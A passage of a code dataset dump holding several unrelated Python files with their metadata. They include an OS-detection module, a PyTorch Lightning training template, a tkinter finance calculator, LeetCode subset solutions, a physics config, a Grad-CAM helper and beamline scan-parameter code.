settings\n\n##############################################################################\n# Initialize module\n\ndef init(i):\n \"\"\"\n\n Input: {}\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n return {'return':0}\n\n##############################################################################\n# find close OS\n\ndef find_close(i):\n \"\"\"\n Input: {\n (os_uoa) - load info from a given OS\n (os_dict) - if non-empty, return this dict\n }\n\n Output: {\n return - return code = 0\n\n platform - 'win' or 'linux'. Careful - it is always for current host OS! \n Use 'ck_name' key from meta for the target OS!\n\n bits - (str) 32 or 64. Careful - it is always for current host OS!\n Use 'bits' key from meta for the target OS!\n\n os_uoa - UOA of the most close OS\n os_uid - UID of the most close OS\n os_dict - meta of the most close OS\n\n (add_path) - list of extra path ...\n }\n \"\"\"\n\n r=ck.get_os_ck({})\n if r['return']>0: return r\n\n bits=r['bits']\n plat=r['platform']\n\n xos=i.get('os_uoa','')\n fc=i.get('find_close','')\n\n if xos=='':\n # Detect host platform\n # Search the most close OS\n ii={'action':'search',\n 'module_uoa':work['self_module_uid'],\n 'search_dict':{'ck_name':plat,\n 'bits':bits,\n 'generic':'yes',\n 'priority':'yes'},\n 'internal':'yes'}\n\n # Adding extra tags to separate different Linux flavours such as Mac OS X:\n import sys\n pl=sys.platform\n\n if pl=='darwin':\n ii['tags']='macos'\n elif plat=='linux':\n ii['tags']='standard'\n\n rx=ck.access(ii)\n if rx['return']>0: return rx\n\n lst=rx['lst']\n if len(lst)==0:\n return {'return':0, 'error':'most close platform was not found in CK'}\n\n pl=lst[0]\n\n xos=pl.get('data_uoa','')\n\n rr={'return':0, 'platform':plat, 'bits':bits}\n\n # Load OS\n if xos!='':\n r=ck.access({'action':'load',\n 'module_uoa':'os', \n 'data_uoa':xos})\n if r['return']>0: return r\n\n os_uoa=r['data_uoa']\n os_uid=r['data_uid']\n\n dd=r['dict']\n\n if len(i.get('os_dict',{}))!=0: # Substitute from 'machine' description (useful for remote access)\n dd=i['os_dict']\n\n rr['os_uoa']=os_uoa\n rr['os_uid']=os_uid\n rr['os_dict']=dd\n\n # Check if need to add path\n x=dd.get('add_to_path_os_uoa','')\n if x!='':\n rx=ck.access({'action':'find',\n 'module_uoa':work['self_module_uid'],\n 'data_uoa':x})\n if rx['return']>0: return rx\n px=rx['path']\n\n rr['add_path']=[px]\n\n return rr\n","sub_path":"module/os/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"292045645","text":"\"\"\"\nRuns a model on a single node across multiple gpus.\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nfrom pl_examples.models.lightning_template import LightningTemplateModel\nfrom pytorch_lightning import Trainer, seed_everything\n\nseed_everything(234)\n\n\ndef main(args):\n \"\"\" Main training routine specific for this project. 
\"\"\"\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)\n\n\ndef run_cli():\n # ------------------------\n # TRAINING ARGUMENTS\n # ------------------------\n # these are project-wide arguments\n root_dir = os.path.dirname(os.path.realpath(__file__))\n parent_parser = ArgumentParser(add_help=False)\n\n # each LightningModule defines arguments relevant to it\n parser = LightningTemplateModel.add_model_specific_args(parent_parser, root_dir)\n parser = Trainer.add_argparse_args(parser)\n parser.set_defaults(gpus=2)\n args = parser.parse_args()\n\n # ---------------------\n # RUN TRAINING\n # ---------------------\n main(args)\n\n\nif __name__ == '__main__':\n run_cli()\n","sub_path":"pl_examples/basic_examples/gpu_template.py","file_name":"gpu_template.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"455182910","text":"\"\"\"\r\nПрограмма для работы с финансовыми расчетами\r\nVersion 1.1\r\nCreate by: Vitalij Ivanovskij \r\nLast change: 16.11.2020\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\n\r\n\r\n# Settings\r\nWIDTH = 500\r\nHEIGHT = 250\r\nWIN_POS_X = 300\r\nWIN_POS_Y = 100\r\nTITLE = 'Financy calculate v1.1'\r\nRESIZABLE_X = False\r\nRESIZABLE_Y = False\r\nFONT = 'Monaco 13'\r\nNOTEBOOK_FONT = 'Monaco 10'\r\nCAPTION_FONT = 'Monaco 13 bold'\r\n\r\n\r\nclass GUI():\r\n \"\"\"Создает пользовательский интерфейс\"\"\"\r\n\r\n def __init__(self):\r\n self.root = self.create_main_GUI_window()\r\n self.tabs = self._create_GUI_tabs()\r\n self.applications = self._add_applications()\r\n self._bind_root_for_change_tabs()\r\n self.style = self.set_styles_for_GUI()\r\n self._application_init(0)\r\n\r\n def create_main_GUI_window(self):\r\n \"\"\"Инициализация пользовательского окна\"\"\"\r\n root = Tk()\r\n root.title(TITLE)\r\n root.geometry(f'{WIDTH}x{HEIGHT}+{WIN_POS_X}+{WIN_POS_Y}')\r\n root.resizable(RESIZABLE_X, RESIZABLE_Y)\r\n return root\r\n\r\n def set_styles_for_GUI(self):\r\n \"\"\"Инициализация стилей оформления виджетов\"\"\"\r\n style = ttk.Style()\r\n style.configure('.', font=FONT, padding=5)\r\n style.configure('TNotebook.Tab', font=NOTEBOOK_FONT, padding=3)\r\n return style\r\n\r\n def _create_GUI_tabs(self):\r\n \"\"\"Создает виджет, который будет содер��ать вкладки на графическом окне\"\"\"\r\n tabs = ttk.Notebook(self.root, style='TNotebook')\r\n tabs.pack(fill='both', expand='yes')\r\n return tabs\r\n\r\n def _add_applications(self):\r\n \"\"\"Инициализирует приложения\"\"\"\r\n self.income = Income(self)\r\n self.mid_percent = MidPersent(self)\r\n self.margin = Margin(self)\r\n return [self.income, self.mid_percent, self.margin]\r\n\r\n def _bind_root_for_change_tabs(self):\r\n \"\"\"\r\n Устанавливает горячие клавиши , для root,\r\n для переключения вкладок.\r\n \"\"\"\r\n self.root.bind('',\r\n lambda event: self._select_prev_tab())\r\n self.root.bind('',\r\n lambda event: self._select_next_tab())\r\n\r\n def _select_prev_tab(self):\r\n \"\"\"Переход на предыдущую вкладку\"\"\"\r\n next_index, prev_index = self._get_tabs_indexes()\r\n self.tabs.select(prev_index)\r\n self._application_init(prev_index)\r\n\r\n def 
_select_next_tab(self):\r\n \"\"\"Переход на следующую вкладку\"\"\"\r\n next_index, prev_index = self._get_tabs_indexes()\r\n self.tabs.select(next_index)\r\n self._application_init(next_index)\r\n\r\n def _application_init(self, index):\r\n \"\"\"\r\n При переключении вкладки устанавливает курсор\r\n в первое поле для ввода\r\n \"\"\"\r\n self.applications[index].entries[0].focus()\r\n\r\n def _get_tabs_indexes(self):\r\n \"\"\"\r\n Определяет индексы предыдущей и следующей вкладок\r\n \"\"\"\r\n cur_index = self.tabs.index('current')\r\n len_tabs = self.tabs.index('end')\r\n next_index = (cur_index + 1) % len_tabs\r\n prev_index = (cur_index - 1 + len_tabs) % len_tabs\r\n return (next_index, prev_index)\r\n\r\n def add_tab(self, frame, caption):\r\n \"\"\"Добавляет приложение в отдельные вкладки\"\"\"\r\n self.tabs.add(frame, text=caption)\r\n tab_index = len(self.tabs.tabs()) - 1\r\n return tab_index\r\n\r\n def show_GUI(self):\r\n self.root.mainloop()\r\n\r\n\r\nclass Application():\r\n \"\"\"Базовый класс для приложений\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.gui = gui\r\n self.frame = ttk.Frame(gui.root)\r\n self.tab_index = self.gui.add_tab(self.frame, self.caption)\r\n\r\n def _add_label(self, text, row, column, sticky='e'):\r\n \"\"\"Добавление текстового поля в интерфейс\"\"\"\r\n label = ttk.Label(self.frame, text=text, width=16)\r\n label.grid(row=row, column=column, sticky=sticky)\r\n return label\r\n\r\n def _add_entry(self, row, column):\r\n \"\"\"Добавление поля ввода в интерфейс\"\"\"\r\n entry = ttk.Entry(self.frame, justify='center', font=FONT, width=10)\r\n entry.grid(row=row, column=column, sticky='n', padx=5)\r\n return entry\r\n\r\n def _prep_values(self, value):\r\n \"\"\"Приведение данных из полей ввода к float\"\"\"\r\n value = value.replace(',', '.')\r\n return float(value)\r\n\r\n def _show_error_message(self):\r\n \"\"\"Вывод сообщения об ошибке (если в поле ввода не число)\"\"\"\r\n messagebox.showinfo('Неверные данные', 'Введены неверные данные...')\r\n\r\n def _bind_entries(self, entries, function):\r\n \"\"\"\r\n Установка гарячих для клавиш полей entries\r\n - перемещение курсора на следующее поле \r\n и выполняет расчет результата\r\n / - перемещение курсора на поле вверх/вниз\r\n \"\"\"\r\n for entry in entries:\r\n # Определение индексов полей: текущего, предыдущего и следующего\r\n cur_index = entries.index(entry)\r\n next_index = (cur_index + 1) % len(entries)\r\n prev_index = (cur_index - 1 + len(entries)) % len(entries)\r\n # Определение следующего поля для перемещения курсора\r\n # (при нажатии , )\r\n next_entry = entries[next_index]\r\n # Определение предыдущего поля для перемещения курсора\r\n # (при нажатии )\r\n prev_entry = entries[prev_index]\r\n\r\n self._bind_entry('',\r\n entry, next_entry)\r\n self._bind_entry('',\r\n entry, prev_entry)\r\n self._bind_entry('',\r\n entry, next_entry, function)\r\n self._bind_entry('', # - Enter на доп. 
клав.\r\n entry, next_entry, function)\r\n\r\n def _bind_entry(self, event_name, entry, next_entry, function=False):\r\n \"\"\"\r\n Установка горячей клавиши для текущего поля\r\n event_name - тип события (,,')\r\n entry - текущее поле\r\n next_entry - поле в которое следует переместить курсор\r\n function - функция, которая кроме перемещения курсора\r\n будет выполняться при нажатии гарячей клавиши\r\n (Для клавиши ).\r\n Если не определена (False) - не выполняется ничего\r\n (для клавиш и ).\r\n \"\"\"\r\n entry.bind(event_name,\r\n lambda event,\r\n entry=entry,\r\n next_entry=next_entry,\r\n function=function:\r\n self._bind_apply(event, entry, next_entry, function))\r\n\r\n def _bind_apply(self, event, entry, next_entry, function):\r\n \"\"\"Установка логики для горячей клавиши\"\"\"\r\n if self._check_entry(event, entry):\r\n next_entry.focus()\r\n if function:\r\n function()\r\n\r\n def _check_entry(self, event, entry):\r\n \"\"\"Проверка поля на корректность данных\"\"\"\r\n value = entry.get()\r\n if not value:\r\n return True\r\n if value:\r\n try:\r\n # Если значение поля преобразовывается в float -\r\n # все в порядке\r\n value = self._prep_values(value)\r\n return True\r\n except:\r\n self._show_error_message()\r\n entry.delete(0, END)\r\n return False\r\n\r\n\r\nclass Margin(Application):\r\n \"\"\"Класс для расчета маржи\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Маржа'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self.margin_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Себестоимость:', row=1, column=0)\r\n self._add_label('Цена:', row=2, column=0)\r\n self._add_label('Маржа равна:', row=1, column=2)\r\n self._add_label('Продажи:', row=3, column=0)\r\n self._add_label('Доход:', row=3, column=2, sticky='n')\r\n self.result_label = self._add_label(\r\n '', row=2, column=2, sticky='n')\r\n self.result_sales_label = self._add_label(\r\n '', row=4, column=2, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.cost_price_entry = self._add_entry(row=1, column=1)\r\n self.price_entry = self._add_entry(row=2, column=1)\r\n self.sales_entry = self._add_entry(row=3, column=1)\r\n return [self.cost_price_entry, self.price_entry, self.sales_entry]\r\n\r\n def margin_calculate(self):\r\n \"\"\"Расчет маржи\"\"\"\r\n cost_price = self.cost_price_entry.get()\r\n price = self.price_entry.get()\r\n sales = self.sales_entry.get()\r\n if cost_price and price:\r\n cost_price = self._prep_values(cost_price)\r\n price = self._prep_values(price)\r\n margin = (price - cost_price) / price * 100\r\n self.result_label['text'] = f'{margin:.1f}%'\r\n if sales:\r\n sales = self._prep_values(sales)\r\n income = sales * margin / 100\r\n self.result_sales_label['text'] = f'{income:.2f}'\r\n\r\n\r\nclass Income(Application):\r\n \"\"\"Класс для расчета роста капитала\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Рост капитала'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self._income_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Капитал:', row=1, column=0)\r\n self._add_label('Процент(год.):', row=2, column=0)\r\n self._add_label('Пополнение(мес.):', row=3, column=0)\r\n self._add_label('Кол-во лет:', row=4, column=0)\r\n self._add_label('Итоговый капитал:', row=1, column=3)\r\n self.result_label = 
self._add_label(\r\n '', row=2, column=3, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.capital_entry = self._add_entry(row=1, column=1)\r\n self.percent_entry = self._add_entry(row=2, column=1)\r\n self.replenish_entry = self._add_entry(row=3, column=1)\r\n self.years_entry = self._add_entry(row=4, column=1)\r\n return (self.capital_entry,\r\n self.percent_entry,\r\n self.replenish_entry,\r\n self.years_entry)\r\n\r\n def _income_calculate(self):\r\n \"\"\"Расчет будущего капитала\"\"\"\r\n capital = self.capital_entry.get()\r\n percent = self.percent_entry.get()\r\n replenish = self.replenish_entry.get()\r\n years = self.years_entry.get()\r\n if capital and percent and years:\r\n capital = self._prep_values(capital)\r\n if replenish:\r\n replenish = self._prep_values(replenish)\r\n else:\r\n replenish = 0\r\n percent = self._prep_values(percent)\r\n # процент вычисляется как среднее геометрическое\r\n # за период 12 месяцев\r\n percent = ((1 + percent / 100) ** (1 / 12) - 1) * 100\r\n years = self._prep_values(years)\r\n monthes = int((years * 12) // 1)\r\n\r\n for i in range(0, monthes):\r\n capital += capital * percent / 100\r\n capital += replenish\r\n self.result_label['text'] = f'{capital:,.2f}'\r\n\r\n\r\nclass MidPersent(Application):\r\n \"\"\"\r\n Класс для расчета среднего процента в год.\r\n Пример:\r\n Получаем прибыль 40% за 4 года. Какая доходность в год?\r\n Делить 40% на 4 не верно. Нужно взять среднее геометрическое значение.\r\n Расчитывается как корень 4-й степени (4 года) из 1.40 (прирост 40%)\r\n Ответ: 8.78%\r\n\r\n \"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Средний процент'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self.mid_percent_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Процент:', row=1, column=0)\r\n self._add_label('Кол-во лет:', row=2, column=0)\r\n self._add_label('Средний процент:', row=1, column=3)\r\n self.result_label = self._add_label(\r\n '', row=2, column=3, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.percent_entry = self._add_entry(row=1, column=1)\r\n self.years_entry = self._add_entry(row=2, column=1)\r\n return [self.percent_entry, self.years_entry]\r\n\r\n def mid_percent_calculate(self):\r\n \"\"\"Расчет среднего процента\"\"\"\r\n percent = self.percent_entry.get()\r\n years = self.years_entry.get()\r\n if percent and years:\r\n percent = self._prep_values(percent)\r\n years = self._prep_values(years)\r\n mid_percent = ((1 + percent / 100) ** (1 / years) - 1) * 100\r\n self.result_label['text'] = f'{mid_percent:.2f}%'\r\n\r\n\r\ndef main():\r\n gui = GUI()\r\n gui.show_GUI()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"financy.py","file_name":"financy.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"623559788","text":"\"\"\"\n78. 
Subsets\nGiven an integer array nums with no duplicate elements, return all possible subsets of the array (the power set).\n\nNote: the solution set must not contain duplicate subsets.\n\nExample:\n\nInput: nums = [1,2,3]\nOutput:\n[\n  [3],\n  [1],\n  [2],\n  [1,2,3],\n  [1,3],\n  [2,3],\n  [1,2],\n  []\n]\n\"\"\"\n\"\"\"\nLibrary-function approach:\nPython's itertools.combinations(iterable, r) creates an iterator that yields every length-r subsequence of iterable, with the items of each subsequence ordered as in the input iterable.\nhttps://www.cnblogs.com/FENG4Y/p/9916060.html\n\"\"\"\nfrom typing import List\nimport itertools\n\n\nclass Solution:\n    def subsets(self, nums: List[int]) -> List[List[int]]:\n        res = []\n        for i in range(len(nums) + 1):\n            for tmp in itertools.combinations(nums, i):\n                res.append(list(tmp))\n        return res\n\n\n# Backtracking: grow the current subset with each element to the right of index i.\nclass Solution:\n    def subsets(self, nums: List[int]) -> List[List[int]]:\n        res = []\n        n = len(nums)\n\n        def helper(i, tmp):\n            res.append(tmp)\n            for j in range(i, n):\n                helper(j + 1, tmp + [nums[j]])\n        helper(0, [])\n        return res\n\n\n# Iterative: for each element, copy every existing subset and add the element to the copy.\nclass Solution:\n    def subsets(self, nums: List[int]) -> List[List[int]]:\n        res = [[]]\n        for i in nums:\n            res = res + [[i] + num for num in res]\n        return res\n\n","sub_path":"medium/78-subsets.py","file_name":"78-subsets.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"297386242","text":"import FWCore.ParameterSet.Config as cms\nfrom RecoTauTag.RecoTau.PFRecoTauQualityCuts_cfi import PFTauQualityCuts\nfrom RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadTrack\nfrom RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation\n\npfRecoTauDiscriminationByECALIsolation = pfRecoTauDiscriminationByIsolation.clone(\n    PFTauProducer = cms.InputTag('pfRecoTauProducer'), # tau collection to discriminate\n\n    # Requiring a leading pion ensures that:\n    # 1) there is at least one track above threshold (0.5 GeV) in the signal cone\n    # 2) a track in the signal cone has pT > 5 GeV\n    Prediscriminants = requireLeadTrack,\n\n    # Select which collections to use for isolation.
You can select one or both\n ApplyDiscriminationByECALIsolation = cms.bool(True), # use PFGammas when isolating\n ApplyDiscriminationByTrackerIsolation = cms.bool(False), # use PFChargedHadr when isolating\n\n applyOccupancyCut = cms.bool(True), # apply a cut on number of isolation objects\n maximumOccupancy = cms.uint32(0), # no gammas w/ pt > 1.5 GeV allowed\n\n applySumPtCut = cms.bool(False), # apply a cut on the sum Pt of the isolation objects\n maximumSumPtCut = cms.double(6.0),\n\n applyRelativeSumPtCut = cms.bool(False), # apply a cut on IsoPt/TotalPt\n relativeSumPtCut = cms.double(0.0),\n\n qualityCuts = PFTauQualityCuts,# set the standard quality cuts\n)\n\n\n","sub_path":"RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByECALIsolation_cfi.py","file_name":"PFRecoTauDiscriminationByECALIsolation_cfi.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518026159","text":"import pandas as pd\nimport numpy as np\n\nclass SlidingWindow:\n\n df = None\n window_size = 0\n\n def create_sld_df_single_exp(self, orig_df, window_size, analytic_functions_list):\n dfs_to_concate = []\n base_df = orig_df.drop('action', axis=1)\n for func in analytic_functions_list:\n method_to_call = getattr(base_df.rolling(window=window_size), func)\n analytic_df = method_to_call()\n analytic_df = analytic_df[window_size:]\n analytic_df.columns = [col + \"_sld_\" + func for col in analytic_df.columns]\n dfs_to_concate.append(analytic_df)\n\n action_df = orig_df[['action']][window_size:] # [[]] syntax to return DataFrame and not Series\n dfs_to_concate.append(action_df)\n return pd.concat(dfs_to_concate,axis=1)\n\n def create_sliding_df(self, orig_df, window_size, analytic_functions_list, expirements, participants):\n dfs_to_concate = []\n cols_to_drop = ['partc', 'action_file_index']\n for e in expirements:\n for p in participants:\n exp_df = orig_df[(orig_df['partc'] == p) & (orig_df['action_file_index'] == e)]\n exp_df = exp_df.drop(cols_to_drop, axis=1)\n exp_roll_df = self.create_sld_df_single_exp(exp_df, window_size, analytic_functions_list)\n\n dfs_to_concate.append(exp_roll_df)\n return pd.concat(dfs_to_concate, axis=0, ignore_index=True)\n\n def __init__(self, orig_df, window_size, num_experiments, num_participants, exclude, fnlist):\n exps = [i for i in range(1,num_experiments + 1) if i != exclude]\n parts = [i for i in range(1,num_participants + 1)]\n smp_df = self.create_sliding_df(orig_df, window_size, fnlist, exps, parts)\n self.window_size = window_size\n self.df = smp_df\n","sub_path":"notebooks/archive/sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"533339129","text":"# continue statement:\n\nfor n in range(1, 10):\n if n >= 5 and n <= 7:\n continue\n print(n)\nprint(\"========\")\n\nfruits = [\"apple\", \"banana\", \"cherry\"]\nfor f in fruits:\n if f == \"banana\":\n continue\n print(f)\nprint(\"========\")\n\nstr = 'Oz34gur17luk'\ntotal = 0\t# The sum of the digits seen so far.\ncount = 0\t# The number of digits seen so far.\nfor i in range(len(str)):\n if str[i].isalpha():\n continue\n total = total + int(str[i])\n count = count + 1\nprint(\"Number of digits =\", count)\nprint(\"Sum of digits =\", 
total)\n","sub_path":"scripts/p391_continue.py","file_name":"p391_continue.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161549241","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 18 00:27:25 2021\n\n@author: saina\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport cv2\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\nclass ModelGradCam(nn.Module):\n \n def __init__(self,model):\n super().__init__()\n \n # get the pretrained resnet network\n self.res = model\n \n # disect the network to access its last convolutional layer\n self.features_conv = nn.Sequential(*list(self.res.children())[:-2])\n \n # # get the max pool of the features stem\n # self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)\n \n # get the classifier of the resnet\n self.classifier1 = list(self.res.children())[-2:][0]\n self.classifier2 = list(self.res.children())[-2:][1]\n\n \n # placeholder for the gradients\n self.gradients = None\n \n # hook for the gradients of the activations\n def activations_hook(self, grad):\n self.gradients = grad\n \n def forward(self, x):\n x = self.features_conv(x)\n \n # register the hook\n h = x.register_hook(self.activations_hook)\n\n # apply the remaining pooling\n x = self.classifier1(x)\n x = F.avg_pool2d(x, 4)\n x = x.view(x.size(0), -1)\n x = self.classifier2(x)\n return x\n \n # method for the gradient extraction\n def get_activations_gradient(self):\n return self.gradients\n \n # method for the activation exctraction\n def get_activations(self, x):\n return self.features_conv(x)\n \n \n\n\ndef gradcam_out(model,img_d,device):\n \n ref = {0: 'airplane',1: 'automobile',2: 'bird',3: 'cat',\n 4: 'deer',5: 'dog',6: 'frog',7: 'horse',\n 8: 'ship',9: 'truck'}\n \n img = img_d['image']\n label = img_d['label'].item()\n predicted = img_d['prediction'].item()\n \n # img = img.to(device)\n \n # initialize the resnet model\n res = ModelGradCam(model)\n \n # set the evaluation mode\n res.eval()\n \n x = img.view(1,3,32,32)\n \n # get the most likely prediction of the model\n pred = res(x)\n \n # get the gradient of the output with respect to the parameters of the model\n pred[:,label].backward()\n \n # pull the gradients out of the model\n gradients = res.get_activations_gradient()\n \n # pool the gradients across the channels\n pooled_gradients = torch.mean(gradients, dim=[0, 2, 3])\n \n # get the activations of the last convolutional layer\n activations = res.get_activations(x).detach()\n \n # weight the channels by corresponding gradients\n \n for i in range(256):\n activations[:, i, :, :] *= pooled_gradients[i]\n \n \n # weight the channels by corresponding gradients\n \n heatmap = torch.mean(activations, dim=1).squeeze()\n # heatmap.shape\n \n # relu on top of the heatmap\n # expression (2) in https://arxiv.org/pdf/1610.02391.pdf\n heatmap = np.maximum(heatmap.cpu(), 0)\n # heatmap.shape\n \n heatmap /= torch.max(heatmap)\n \n img = img_d['image']\n img_arr = np.transpose(img.cpu().data.numpy() , (1,2,0))\n img_arr = ((img_arr - img_arr.min()) * (1/(img_arr.max() - img_arr.min()) * 255)).astype('uint8')\n \n heatmap_numpy_resized = cv2.resize(heatmap.cpu().data.numpy(), (img_arr.shape[0], img_arr.shape[1]))\n heatmap_rescaled = np.uint8(255 * heatmap_numpy_resized)\n\n # plt.imshow(heatmap_rescaled)\n heatmap_final = cv2.applyColorMap(heatmap_rescaled, cv2.COLORMAP_JET)\n superimposed_img 
= heatmap_final * 0.4 + img_arr\n cv2.imwrite('C:\\\\Users\\\\saina\\\\Documents\\\\EVA\\\\S10\\\\Incorrect_GC\\\\' +ref[label] + '_' + ref[predicted]+ '.jpg', superimposed_img)\n print('Image Written')\n \n return superimposed_img, ref[label], ref[predicted]","sub_path":"S11/gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214331409","text":"########## Used as a connection between main, parameters, queue, and location\n\nimport numpy\nfrom bluesky.plans import grid_scan\nfrom ophyd.sim import det4, motor1, motor2, noisy_det\nimport bluesky.preprocessors as bpp\n\n#For Spectroscopy Scans\nglobal erange, estep, acqtime, scan_sec, sample, file, krange, kstep, E0 , ax1, ax2, ax3, xmotor, ymotor, zmotor\nerange = []\nestep = []\nacqtime = 0\nscan_sec = 0\nsample = ''\nfile = ''\nax1 = None\nax2 = None\nax3 = None\nkrange = []\nkstep = []\nE0 = 0\nxmotor = 0\nymotor = 0\nzmotor= 0\n\n\n############################# Setting Parameters (Used in parameters) #################################\n\ndef RunScan(range1,step1,dwell,sample1,file1, range2 = numpy.array([]), step2 = numpy.array([]), energy = 0):\n 'Collects the erange, estep, dwell, samplename, filename, krange, kstep, and E0 to run a Spectroscopy Scan'\n\n global erange, estep, acqtime, sample, file, krange, kstep, E0\n erange = []\n estep = []\n krange = numpy.array([])\n kstep = numpy.array([])\n E0 = 0\n acqtime = 0\n erange = range1\n estep = step1\n krange = range2\n kstep = step2\n E0 = energy\n acqtime = dwell\n sample = sample1\n file = file1\n\n\n############################# Setting Seconds (Used in parameters) #################################\n\ndef CalcTime(sec):\n 'Collecting the seconds for a Spectroscopy Scan (Used for estimated scan time)'\n global scan_sec\n scan_sec = 0\n scan_sec = sec\n\n\n############################# Retrieving the Parameters (Used in main) #################################\n\ndef collect_args(ax11 = None, ax22 = None, ax33 = None):\n 'Sending main the kwargs to run a my_xanes plan'\n global erange, estep, acqtime, sample, file, krange, kstep, E0, ax1, ax2, ax3, xmotor, ymotor, zmotor\n ax1 = ax11\n ax2 = ax22\n ax3 = ax33\n if erange == []:\n #The user forgot to save the parameters\n return 0\n elif krange == []:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange,\n 'k_steps': kstep, 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n else:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange.tolist(),\n 'k_steps': kstep.tolist(), 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n\n\n\n############################# Retrieving the Parameters (Used in Queue) #################################\n\ndef add_to_queue():\n 'Sending the queue the kwargs to add to the queue'\n global krange, kstep, E0, erange, estep, acqtime, sample, file, ax1, ax2, ax3, xmotor, ymotor, zmotor\n if erange == []:\n #The user forgot to save the parameters\n return 0\n elif krange == []:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange,\n 'k_steps': kstep, 'dwell': acqtime, 'samplename': sample,\n 
'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n else:\n return {'x_motor': xmotor, 'y_motor': ymotor, 'z_motor': zmotor, 'e_range': erange.tolist(), 'e_steps': estep.tolist(), 'E_0': E0, 'k_range': krange.tolist(),\n 'k_steps': kstep.tolist(), 'dwell': acqtime, 'samplename': sample,\n 'filename': file, 'ax11': ax1, 'ax22': ax2, 'ax33': ax3}\n\n\n\n################################### Retrieving Seconds (Used in main) ###################################\n\ndef collect_secs():\n global scan_sec\n return scan_sec\n\n\n################################## Setting Motors (Used in Location)#######################################\n\ndef set_motors(x, y, z):\n global xmotor, ymotor, zmotor\n xmotor = 0\n ymotor = 0\n zmotor = 0\n xmotor = x\n ymotor = y\n zmotor = z\n\n\n\n\n\n\n#For XRF Mapping\nglobal xstart,xstop,xnum, ystart,ystop, ynum, xrf_dwell, second, flymotor, stepmotor,courseXfly,courseYfly\nxstart = 0\nystart = 0\nxstop = 0\nystop = 0\nynum = 0\nxnum = 0\nxrf_dwell = 0\nsecond = 0\nflymotor = ''\nstepmotor = ''\ncourseXfly=''\ncourseYfly=''\n\n\n############################# Setting Parameters (Used in Window_) #################################\n\ndef SavingXRF(xstart1,xstop1,xnum1, ystart1,ystop1, ynum1, xrf_dwell1, second1, flymotor1, stepmotor1,courseXfly_,courseYfly_ ):\n 'Collects the xstart, xstop xnum, ystart, ystop, ynum, dwell, seonds, flymotor, and stepping motor to run a Spectroscopy Scan'\n global xstart, xstop, xnum, ystart, ystop, ynum, xrf_dwell, second, flymotor, stepmotor,courseXfly,courseYfly\n xstart = 0\n ystart = 0\n xstop = 0\n ystop = 0\n ynum = 0\n xnum = 0\n xrf_dwell = 0\n second = 0\n flymotor = ''\n stepmotor = ''\n xstart = xstart1\n ystart = ystart1\n xstop = xstop1\n ystop = ystop1\n xnum = 